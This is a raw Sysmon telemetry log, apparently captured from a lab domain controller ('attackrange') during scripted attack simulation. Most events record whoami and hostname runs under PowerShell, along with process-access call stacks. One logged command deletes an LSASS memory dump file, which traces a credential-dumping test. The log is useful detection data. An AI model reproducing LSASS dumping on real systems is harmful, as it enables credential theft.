(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135e1474(wow64) 154100x8000000000000000179998Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.618{29E67E80-D432-601A-3930-00000000A301}6516C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x8000000000000000179997Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.606{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-02-03 16:49:54.606 11241100x8000000000000000179996Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.606{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-02-03 16:49:54.606 10341000x8000000000000000179995Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.481{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D432-601A-3830-00000000A301}5884C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179994Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179993Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179992Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179991Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179990Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-84F4-6019-2C05-00000000A301}19284632C:\Windows\system32\csrss.exe{29E67E80-D432-601A-3830-00000000A301}5884C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179989Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D432-601A-3830-00000000A301}5884C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+141132a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b43b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64) 154100x8000000000000000179988Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.477{29E67E80-D432-601A-3830-00000000A301}5884C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000179987Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D432-601A-3730-00000000A301}1196C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179986Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179985Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179984Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179983Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179982Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-84F4-6019-2C05-00000000A301}19285340C:\Windows\system32\csrss.exe{29E67E80-D432-601A-3730-00000000A301}1196C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179981Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.465{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D432-601A-3730-00000000A301}1196C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+141132a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b43b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64) 154100x8000000000000000179980Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.463{29E67E80-D432-601A-3730-00000000A301}1196C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000180022Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.621{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D438-601A-3B30-00000000A301}4188C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180021Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.621{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180020Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.621{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180019Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.621{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180018Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.621{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180017Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:00.621{29E67E80-84F4-6019-2C05-00000000A301}19284632C:\Windows\system32\csrss.exe{29E67E80-D438-601A-3B30-00000000A301}4188C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180016Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 